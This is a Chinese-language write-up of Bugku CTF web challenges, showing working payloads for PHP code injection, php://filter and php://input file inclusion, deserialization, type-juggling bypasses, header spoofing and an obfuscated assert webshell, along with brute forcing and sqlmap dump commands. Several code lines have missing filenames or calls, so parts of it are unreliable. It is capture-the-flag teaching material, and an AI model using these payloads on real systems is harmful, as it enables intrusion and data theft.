目录
1.web2
2.计算器
3. web基础$_GET
4. web基础$_POST
5.矛盾
6. web3
7. 域名解析
8.你必须让他停下
9.本地包含
10.变量1
11.web5
12.头等舱
13.网站被黑
14. 管理员系统
15.web4
在index里
17.输入密码查看flag
18.点击一百万次
19. 备份是个好习惯
20.成绩单
21. 秋名山老司机
22.速度要快
欺骗
give up
to bugkuctf
28.前女友(SKCTF)
30 .你从哪里来
31. md5 collision(NUPT_CTF)
32.程序员本地网站
33.各种绕过
34.web8
35.细心
36. 求getshell
INTO注入
38.这是一个神奇的登陆框
39.多次
40.PHP_encrypt_1(ISCCCTF)
1.web2
听说聪明的人都能找到答案
http://123.206.87.240:8002/web2/
查看源码,。。。
2.计算器
地址:http://123.206.87.240:8002/yanzhengma/
只能输入一位数
F12修改输入框长度
得到flag
3. web基础$_GET
$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';
flagflag{bugku_get_su8kej2en}
构造payoad
http://123.206.87.240:8002/get/?what=flag
得到flag
4. web基础$_POST
$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';
post传值
5.矛盾
$num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';
}
不是数字,而且等于1,比较容易想到的是%00,%20截断
http://123.206.87.240:8002/get/?num=1%00
http://123.206.87.240:8002/get/?num=1%20
实际上只要1后面随便跟一个不是数字的都可以
6. web3
不停弹窗,查看源码,
发现有点东西
#75;EY{J2sa42ahJK-HS11III}
Unicode转ASCII
7. 域名解析
听说把 解析到123.206.87.240 就能拿到flag
进入听说把 解析到123.206.87.240 就能拿到flag
修改hosts文件:进入C:\Windows\System32\drivers\etc的hosts在最后添加
120.24.86.145
访问即可
不知道为啥最近访问不了,吐槽一波,bugku运维的好懒。。。
8.你必须让他停下
进去之后你发现一张不断闪动的图片,bp抓一下包
GET /web12/ HTTP/1.1
Host: 123.206.87.240:8002
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
多点了两下,就出来了
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Nov 2018 12:00:28 GMT
Content-Type: text/html
Connection: close
Content-Length: 630
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<title>Dummy game</title>
</head>
<script language="JavaScript">
function myrefresh(){
();
}
setTimeout('myrefresh()',500);
</script>
<body>
<center><strong>I want to play Dummy game with others£¡But I can't stop!</strong></center>
<center>Stop at panda ! u will get flag</center>
<center><div><img src=""/></div></center><br><a style="display:none">flag{dummy_game_1s_s0_popular}</a></body>
9.本地包含
地址:http://123.206.87.240:8003/
<?php
include "";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>
源码分析:
语句在服务器执行php文件之前在该文件中插入的内容
2.$_request这个变量和$_GET、$_POST一样,都属于超级全局变量,但是呢,运行时修改后者不会影响前者,反之亦然
3.以get/post等方式赋值给$a
函数把字符串当作命令直接执行,var_dump() 函数用于输出变量a的类型和值。
5.把本页代码以高亮语法显示出来
构造payload
GET传参
http://123.206.87.240:8003/?hello=file('')
file()函数的作用是读取文件,然后以数组的形式返回
http://123.206.87.240:8003/?hello=show_source(%%27)
show_source()高亮显示的值
http://123.206.87.240:8003/?hello=1);show_source(%%27);//
);把前面的命令闭合掉,show_source()函数对进行PHP语法高亮显示,//把原来命令的残余部分注释掉
show_source(%%27);就可以执行了。
http://120.24.86.145:8003/?hello=1);show_source(%%27);var_dump(3
var_dump( 输出原来命令的残余部分以及3
得到flag
POST传参
http://123.206.87.240:8003/?hello=1);include $_POST['f'];//
在POST区域:f=php://filter/convert.base64-encode/resource=
base64解码即可
总结:
攻击方式和SQL注入的payload很像:
“);”负责把前面的命令闭合掉
“//”负责把原来命令的残余部分注释掉
中间的那部分就是我们希望执行的命令,这是典型的“命令注入”式的攻击方式!
所以payload的格式是:
);the_command_that_you_want_to_execute//
10.变量1
http://123.206.87.240:8004/
flag In the variable ! <?php
error_reporting(0);
include ""; //包含
highlight_file(__file__); //高亮显示php文件
if(isset($_GET['args'])){
$args = $_GET['args']; //get方式获得args
if(!preg_match("/^\w+$/",$args)){ //匹配/^\w+$/,没匹配到的话,程序结束
die("args error!");
}
eval("var_dump($$args);"); //执行var_dump()函数,
//$$存在文件包含漏洞,只需要给args传一个全局数组变量即可
?>
构造payload:
http://123.206.87.240:8004/?args=GLOBALS
11.web5
JSPFUCK??????答案格式CTF{**}
http://123.206.87.240:8002/web5/
字母大写
F12发现JSPFUCK
复制代码,进入控制台,enter
12.头等舱
http://123.206.87.240:9009/
看来真的没啥了。。
bp抓下包
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Nov 2018 07:53:45 GMT
Content-Type: text/html
Connection: close
flag{Bugku_k8_23s_istra}:
Content-Length: 139
<html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<pre><br><br><br><br>ä»ä¹ä¹æ²¡æã<br><br>
</html>
13.网站被黑
http://123.206.87.240:8002/webshell/
这个题没技术含量但是实战中经常遇到
没技术含量 ,先御剑跑一波。。
发现http://123.206.87.240:8002/webshell/
进去看看
需要密码,bp爆破一波
密码 hack
14. 管理员系统
http://123.206.31.85:1003/
flag格式flag{}
既然是管理员系统,那么用户名就是admin
bp爆破得到密码
在bp中修改好,go
<html>
<head>
<title></title>
</head>
<body>
<h1></h1>
<form method="POST" autocomplete="off">
<p>Username:
<input type="text" name="user" >
</p>
<p>Password:
<input type="password" name="pass" >
</p>
<p>
<input type="submit" value="Submit"/>
<input type="reset" value="Reset"/>
</p>
</form>
<font style="color:#FF0000">
<h3>The flag is: 85ff2ee4171396724bae20c0bd851f6b</h3>
<br\></font\>
</body>
</html>
<!-- dGVzdDEyMw== -->
发现flag,然而dGVzdDEyMw==是什么鬼
解码后test123
然后再网页中发现了这个
。。。,感觉到出题人深深的恶意
15.web4
看看源代码吧
http://123.206.87.240:8002/web4/
查看源代码
拼接一下,然后url解码
dGVzdDEyMw==function checkSubmit(){var a=("password");if("undefined"!=typeof a){if("67d709b2b
54aa2aa648cf6e87a7114f1"==)return!0;alert("Error");();return!1}}("levelQuest").onsubmit=checkSubmit;
发现67d709b2b54aa2aa648cf6e87a7114f1,提交一下试试
在index里
http://123.206.87.240:8005/post/
源码
抓包
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Nov 2018 08:41:04 GMT
Content-Type: text/html
Connection: close
Content-Length: 105
<html>
<title>Bugku-ctf</title>
<a href="./?file=">click me? no</a></html>
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Nov 2018 08:48:02 GMT
Content-Type: text/html
Connection: close
Content-Length: 58
<html>
<title>Bugku-ctf</title>
test5</html>
啥都没有。。。
题目提示在index里,而
http://123.206.87.240:8005/post/?file=
一看就有问题
我们可以使用php://filter读取文件内容
构造payload
http://123.206.87.240:8005/post/?file=php://filter/read=convert.base64-encode/resource=
得到
PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==
解码
<html>
<title>Bugku-ctf</title>
<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./?file=">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>
不懂得参考
/qq_40657585/article/details/83149305
17.输入密码查看flag
http://123.206.87.240:8002/baopo/
作者:Se7en
爆破一波
密码 13579
这个想吐槽一下,你就不能说五位数字吗,你知道五位数的密码有多大吗。。
18.点击一百万次
http://123.206.87.240:9001/test/
hints:JavaScript
点击一百万次就可以了,这个是真的,不骗你。。。
19. 备份是个好习惯
http://123.206.87.240:8002/web16/
听说备份是个好习惯
发现md5
d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e
解码 空字符,没用
题目说备份,御剑走起来
访问.bak下载得到php文件
<?php
/**
* Created by PhpStorm.
* User: Norse
* Date: 2017/8/6
* Time: 20:22
*/
include_once "";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);
echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag."取得flag";
}
?>
整段代码的意思是将get的两个参数中的key替换为空(这里可以用kekeyy绕过),然后对key1,key2的值进行md5加密,并进行比较,
如果md5加密的值一样而未加密的值不同,就输出flag.
构造payload
数组绕过
http://123.206.87.240:8002/web16/?kekeyy1[]=something&kekeyy2[]=anything
==比较漏洞绕过
http://123.206.87.240:8002/web16/?kekeyy1[]=md51&kekeyy2[]=md52
任选两个0e开头的md5值即可
20.成绩单
快来查查成绩吧
http://123.206.87.240:8002/chengjidan/
post方式注入,第一次见,代码都一样,就是写的地方不一样,hackbar不好使了,sqlmap一波
sqlmap post方式注入 :--data=DATA
-u http://123.206.87.240:8002/chengjidan/ --data="id=1" --dbs //爆数据库
-u http://123.206.87.240:8002/chengjidan/ --data="id=1" -D skctf_flag --table //爆表名
-u http://123.206.87.240:8002/chengjidan/ --data="id=1" -D skctf_flag -T fl4g --dump //爆字段
21. 秋名山老司机
http://123.206.87.240:8002/qiumingshan/
是不是老司机试试就知道。
必须上脚本了
#!/usr/bin/python
# -*- coding:utf8 -
import requests
import re
url = 'http://123.206.87.240:8002/qiumingshan/'
s = () //获取session值,不然服务器认为是新请求
text = (url) //获取url内容
exp = (r'(\d+[+\-*])+(\d+)',).group() //搜索符合要求的字符
result = eval(exp) //执行表达式
post = {'value':result} //赋值
print((url,data=post).content) //post传值并请求url,输出文本
原来你也是老司机 Bugku{YOU_DID_IT_BY_SECOND}
Process finished with exit code 0
22.速度要快
速度要快!!!!!!
http://123.206.87.240:8002/web6/
格式KEY{xxxxxxxxxxxxxx}
bp抓下包
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Nov 2018 13:13:23 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
flag: 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogTmpVMk5qWTE=
Content-Length: 89
</br>ææè§ä½ å¾å¿«ç¹!!!<!-- OK ,now you have to post the margin what you find -->
写脚本吧
#!/usr/bin/python
# -*- coding:utf8 -
import requests
import base64
# s = '6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogTkRFeE5UZz0='
# b = base64.b64decode(s)
# print(b)
url = 'http://123.206.87.240:8002/web6/'
s = ()
re = (url)
key = base64.b64decode(['flag']) //headers[]将headers格式化,要获取flag必须加‘’
print(key)
key = base64.b64decode((':')[1]) //分割字符串,获取:以后的值
print(key)
print ((url,data={'margin':key}).text) //post方式传递margin
跑的还不错,给你flag吧: MzcwMjQx
370241
KEY{111dd62fcd377076be18a}
欺骗
http://123.206.87.240:8002/web11/
答案格式:KEY{xxxxxxxx}
rfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibry
没看出来是啥编码,。。。
注意到ip地址里,base64
http://123.206.87.240:8002/web11/?line=&filename=a2V5cy50eHQ=
解码一哈,
仿照格式,试了一波,并且line=1
发现代码,改line的值,可以出现其余代码,
当然也可以写脚本
#!/usr/bin/python
# -*- coding:utf8 -
import requests
s = ''
for i in range(0,100):
url = 'http://123.206.87.240:8002/web11/?line='+str(i)+'&filename=aW5kZXgucGhw'
s = (url)
print
获得的代码
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'',
'1' =>'',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='';
分析代码知,只有cookie里的margin=margin,才能访问
伪造cookie
GET /web11/?line=&filename=a2V5cy5waHA= HTTP/1.1
Host: 123.206.87.240:8002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: margin=margin
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
返回头
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Nov 2018 13:45:19 GMT
Content-Type: text/html
Connection: close
Content-Length: 30
<?php $key='KEY{key_keys}'; ?>
得到flag
give up
题目肯定坏了,放弃
to bugkuctf
右键查看源码
you are not the number of bugku !
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //
}else{
echo "you are not admin ! ";
}
-->
构造payload查看
Request
POST /test1/?txt=php://input&file=&password= HTTP/1.1
Host: 123.206.87.240:8006
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://123.206.87.240:8006/test1/?txt=php://input&file=&password=
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Cookie: PHPSESSID=1ebjlloqm0t413ckj4k20pfhc0g1pvib
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
welcome to the bugkuctf
Response
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Nov 2018 14:05:58 GMT
Content-Type: text/html
Connection: close
Content-Length: 324
hello friend!<br>
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //
}else{
echo "you are not admin ! ";
}
-->
利用php://input 输入welcome to the bugkuctf
POST /test1/?txt=php://input&file=php://filter/read=convert.base64-encode/resource=&password= HTTP/1.1
Host: 123.206.87.240:8006
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://123.206.87.240:8006/test1/?txt=php://input&file=&password=
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Cookie: PHPSESSID=1ebjlloqm0t413ckj4k20pfhc0g1pvib
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
welcome to the bugkuctf
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Nov 2018 14:09:07 GMT
Content-Type: text/html
Connection: close
Content-Length: 658
hello friend!<br>PD9waHAgIA0KICANCmNsYXNzIEZsYWd7Ly9mbGFnLnBocCAgDQogICAgcHVibGljICRmaWxlOyAgDQogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9zdHJpbmcoKXsgIA0KICAgICAgICBpZihpc3NldCgkdGhpcy0+ZmlsZSkpeyAgDQogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgDQoJCQllY2hvICI8YnI+IjsNCgkJcmV0dXJuICgiZ29vZCIpOw0KICAgICAgICB9ICANCiAgICB9ICANCn0gIA0KPz4gIA==
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //
}else{
echo "you are not admin ! ";
}
-->
利用php://filter读取文件内容
看到base64了,有点激动
解码
<?php
class Flag{//
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("good");
}
}
}
?>
emmm,继续吧,看到file_get_contents(),文件包含,
同样的方法,看一下源码,利用php://filter读取的内容
POST /test1/?txt=php://input&file=php://filter/read=convert.base64-encode/resource=&password= HTTP/1.1
Host: 123.206.87.240:8006
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://123.206.87.240:8006/test1/?txt=php://input&file=&password=
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Cookie: PHPSESSID=1ebjlloqm0t413ckj4k20pfhc0g1pvib
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
welcome to the bugkuctf
<?php
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
echo "hello friend!<br>";
if(preg_match("/flag/",$file)){
echo "涓嶈兘鐜板湪灏辩粰浣爁lag鍝�";
exit();
}else{
include($file);
$password = unserialize($password);
echo $password;
}
}else{
echo "you are not the number of bugku ! ";
}
?>
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //
}else{
echo "you are not admin ! ";
}
-->
include($file);
$password = unserialize($password);
echo $password;
反序列化,在password处传,
POST /test1/?txt=php://input&file=&password=O:4:"Flag":1:{s:4:"file";s:8:"";}" HTTP/1.1
Host: 123.206.87.240:8006
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://123.206.87.240:8006/test1/?txt=php://input&file=&password=
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Cookie: PHPSESSID=1ebjlloqm0t413ckj4k20pfhc0g1pvib
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
welcome to the bugkuctf
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Nov 2018 14:33:42 GMT
Content-Type: text/html
Connection: close
Content-Length: 380
hello friend!<br> <?php
//flag{php_is_the_best_language} 1
?><br>good
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //
}else{
echo "you are not admin ! ";
}
-->
得到flag,好题
26.过狗一句话
<?php
$poc="a#s#s#e#r#t";
$poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5];
$poc_2($_GET['s'])
?>
解释一下:
explode()用#号把$poc字符串用#打散为数组poc_1,然后拼接为字符串poc_2,也就是assert
assert() 任意代码执行,打印当前目录
?s=var_dump(scandir(%27./%27))
访问即可
27.
28.前女友(SKCTF)
http://123.206.31.85:49162/
flag格式:SKCTF{xxxxxxxxxxxxxxxxxx}
看源码
<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
$v1 = $_GET['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
if($v1 != $v2 && md5($v1) == md5($v2)){
if(!strcmp($v3, $flag)){
echo $flag;
}
}
}
?>
构造payload
http://123.206.31.85:49162/?v1[]=QNKCDZO&v2[]=s878926199a&v3[]=
30 .你从哪里来
http://123.206.87.240:9009/
将Refer改为
Referer:
31. md5 collision(NUPT_CTF)
构造payload
http://123.206.87.240:9009/?a=s878926199a
32.程序员本地网站
伪造ip头
x-forwarded-for: 127.0.0.1
x-remote-IP: 127.0.0.1
x-remote-ip: 127.0.0.1
x-client-ip: 127.0.0.1
x-client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
33.各种绕过
各种绕过哟
http://123.206.87.240:8002/web7/
<?php
highlight_file('');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
if ($_GET['uname'] == $_POST['passwd'])
print 'passwd can not be uname.';
else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))
die('Flag: '.$flag);
else
print 'sorry!';
}
构造payload
http://123.206.87.240:8002/web7/?uname[]=1&id=margin
post传值:passwd[]=2
34.web8
txt????
http://123.206.87.240:8002/web8/
<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>
file_get_contents()文件包含漏洞
提示说有txt文件,尝试
发现是flags,因此可以构造
http://123.206.87.240:8002/web8/?ac=flags&fn=
得到flag
35.细心
地址:http://123.206.87.240:8002/web13/
想办法变成admin
请求头 响应头啥也没有
御剑扫一波目录
访问
http://123.206.87.240:8002/web13/
访问一哈
慌得一批,在下面看见get传参
又想起来提示admin
http://123.206.87.240:8002/web13/?x=admin
36. 求getshell
求getshell
http://123.206.87.240:8002/web9/
感觉是00截断,各种操作,没有用,很难受
上网搜了一波,发现是后缀名黑名单检测和类型检测
php别名:php2, php3, php4, php5, phps, pht, phtm, phtml。
Content-Type大小写绕过。
学到了,不太懂。
INTO注入
38.这是一个神奇的登陆框
http://123.206.87.240:9001/sql/
flag格式flag{}
post方式注入
上神器sqlmap+bp
POST /sql/ HTTP/1.1
Host: 123.206.87.240:9001
Content-Length: 43
Cache-Control: max-age=0
Origin: http://123.206.87.240:9001
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://123.206.87.240:9001/sql/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
admin_name=1&admin_passwd=1&submit=GO+GO+GO
bp抓一下包,存为
python2 -r "C:\Users\ppp\Desktop\" -p admin_name --dbs
python2 -r "C:\Users\ppp\Desktop\" -p admin_name -D bugkusql1 --tables
python2 -r "C:\Users\ppp\Desktop\" -p admin_name -D bugkusql1 -T flag1 --dump